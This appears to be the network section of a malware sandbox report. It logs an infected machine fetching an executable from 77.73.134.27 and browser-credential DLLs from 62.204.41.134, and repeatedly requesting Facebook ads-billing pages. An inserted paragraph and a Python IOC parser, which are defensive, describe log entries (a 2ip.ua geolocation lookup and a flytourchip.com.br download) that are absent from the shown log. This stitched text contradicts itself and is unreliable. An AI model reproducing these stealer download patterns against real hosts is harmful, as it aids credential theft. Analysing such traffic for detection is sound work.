Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.73.134.27
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com
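The request entries above run their headers together because the report lost the CRLF between them, which makes the interesting details easy to miss: seven browser/crypto DLLs (nss3, msvcp140, vcruntime140, mozglue, freebl3, softokn3, sqlite3) pulled from 62.204.41.134 with an all-digit User-Agent and a Content-Type header on a GET, the api.2ip.ua /geo.json lookup repeated four times, a second-stage executable fetched from flytourchip.com.br with an IE-style User-Agent, and a literal "User-Agent: User-Agent:" header on the Facebook ads-manager and iueg.aappatey.com requests. The Python below is an added example, not part of the report and not code from any family it names: it re-splits such flattened lines on header names, tags those patterns and collects host/path pairs as IOCs. The report does not say which family issued which request; the family names in the comments are assumptions, and the sample lines are copied from the entries above.

```python
"""Parse flattened 'HTTP traffic detected' entries of a sandbox report and
tag the request patterns that matter for detection.

Added example; not part of the sandbox report and not code from any of the
malware families named in it. Family attributions in comments are the
author's assumptions, not statements the report makes.
"""
import re
from collections import defaultdict

# Header names that occur in this report's entries. The flattening dropped the
# CRLF between headers, so boundaries are recovered by looking for "<Name>: "
# (assumption: no header value contains such a token).
HEADER_NAMES = [
    "Connection", "User-Agent", "Host", "Accept", "Accept-Language",
    "Content-Type", "Cache-Control", "Upgrade-Insecure-Requests",
    "sec-ch-ua", "sec-ch-ua-mobile", "sec-ch-ua-platform",
    "sec-ch-prefers-color-scheme", "Sec-Fetch-Site", "Sec-Fetch-Mode",
    "Sec-Fetch-User", "Sec-Fetch-Dest",
]
_HEADER_SPLIT = re.compile(
    r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))
_REQUEST_LINE = re.compile(
    r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]")

# Constructed from entries in the report's network section; headers are run
# together exactly as the flattened report prints them.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: flytourchip.com.br",
    "Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua",
    "Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700",
]


def parse_request(line):
    """Return {'method', 'path', 'headers': [(name, value), ...]} or None."""
    m = _REQUEST_LINE.search(line)
    if m is None:
        return None
    headers = []
    for chunk in _HEADER_SPLIT.split(line[m.end():]):
        if chunk:
            name, _, value = chunk.partition(": ")
            headers.append((name, value))  # a doubled header keeps its "" value
    return {"method": m["method"], "path": m["path"], "headers": headers}


def tag_request(req):
    """Detection tags for one parsed request (family mapping is an assumption)."""
    by_name = defaultdict(list)
    for name, value in req["headers"]:
        by_name[name].append(value)
    host = by_name["Host"][0] if by_name["Host"] else ""
    agents = by_name["User-Agent"]
    path = req["path"].lower()
    tags = []
    # "User-Agent: User-Agent: ..." - the malformed header shared by the
    # report's Facebook ads-manager and /check/safe requests.
    if len(agents) > 1 and "" in agents:
        tags.append("doubled-user-agent")
    # Browser-credential DLLs fetched with an all-digit User-Agent
    # (assumed Raccoon Stealer v2 behaviour).
    if path.endswith(".dll") and any(a.isdigit() for a in agents):
        tags.append("numeric-ua-dll-fetch")
    # A Content-Type header on a body-less GET is a client quirk worth flagging.
    if req["method"] == "GET" and by_name["Content-Type"]:
        tags.append("content-type-on-get")
    # Geolocation check before acting (assumed Djvu behaviour).
    if host == "api.2ip.ua" and req["path"] == "/geo.json":
        tags.append("geo-lookup")
    # Second-stage executable pulled with an IE/Trident User-Agent.
    if path.endswith(".exe") and any("Trident/" in a for a in agents):
        tags.append("exe-download-ie-ua")
    return tags


def extract_iocs(lines):
    """Map each contacted host to the set of paths requested from it."""
    iocs = defaultdict(set)
    for line in lines:
        req = parse_request(line)
        if req is None:
            continue
        host = next((v for n, v in req["headers"] if n == "Host"), "")
        iocs[host].add(req["path"])
    return dict(iocs)


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        req = parse_request(line)
        if req is not None:
            print(req["method"], req["path"], tag_request(req))
    for host, paths in sorted(extract_iocs(SAMPLE_LINES).items()):
        print(host, sorted(paths))
```

Feeding the whole network section through `extract_iocs` gives a host-to-path table that can go straight into a blocklist; `tag_request` is where an analyst would add further patterns as they are confirmed.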
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gnse3G6QHxmrV1%2FSGGhyhlKBQirQCs8SBnoP8Hqt97J01hgXqEr%2FqdRRF7r15GGDPwnzz4pR73p5RnDH84zEShW5P5OuBq%2F2jo2VmbW1%2FMakUdtmpss7tZgcXl7azYew"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e475f6a0435fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a Data Ascii: 7=R
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F8cFb1Ag5qBQY9lRkQWi5K6Cftpb5LXeW7agILbLK5pNqx7gDOXr8DOwb64RgOO%2F%2B%2Fo%2FJYjWJnjv27o%2FYya3LMbI87MdmnyHGue7OCClBFhd%2BBKsC8ViVQbxdTzLf9gG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47605b8535fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e e1 ea 54 77 7e fc 3d db 2e 07 f1 07 bd db 32 9c 2f 69 13 f0 83 36 3b 0f 9b f2 b0 2c 4d dd f2 3e 40 1e 84 c3 65 b9 85 5b 54 2b fd a4 4f bf 3f f9 58 56 be 86 1c d3 e9 c5 af 0e 1c 26 c4 35 82 fe 74 29 67 3d 8c a3 94 8b b9 2b 9a 0d 2f f7 11 bf 6c 13 d9 e6 58 b6 8b 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cc 00 18 46 b9 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e df f7 ff 78 31 53 db c4 0d 13 13 6b 5e e1 92 24 18 4f c5 03 11 cb a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba f2 96 be 21 51 61 02 fd 38 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 7b 5d e4 0e 98 eb 7e 71 eb 90 f0 1a 88 fa 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 2d b9 ee e6 cc 23 02 64 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 5b e5 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 
13 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 99 f2 df 8e 82 11 e8 e4 1f c4 a1 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 0c 03 81 1f d4 ec 68 91 9c 99 04 f1 2c c0 ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 83 0a 1a 16 50 6d 43 cc bd 8b 8b e1 b2 7e d7 9c 8c c3 e0 2b e7 b7 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 ba b6 51 6f ec 8c 1c 8f 38 f5 52 48 24 3e 96 4d d1 e7 17 3f 8e e6 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e b1 f8 af 8e 5a ff c3 a7 de aa ca d4 5f 29 46 43 9c 51 03 62 18 56 1e f8 40 aa ae 88 c1 c4 a1 33 25 7d Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*nTw~=.2/i6;,M>@e[T+O?XV&5t)g=+/lX3Ob>!ZC:>FtSSP*{~x1Sk^$Oa~i~]DzN,!Qa8|(kJk?a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYfItLvwmQjgr9T8ujSYloaH72fpVPWWZn59k6bZx18UuttH4o92OEE%2Fp6EqChDtZqKHR%2BEoHWBNxrsK6z20WtVJ7QA287bvdLqiiYWpfKNvaHuYxcwaGTEQrn1RsDof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e4763d89935fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 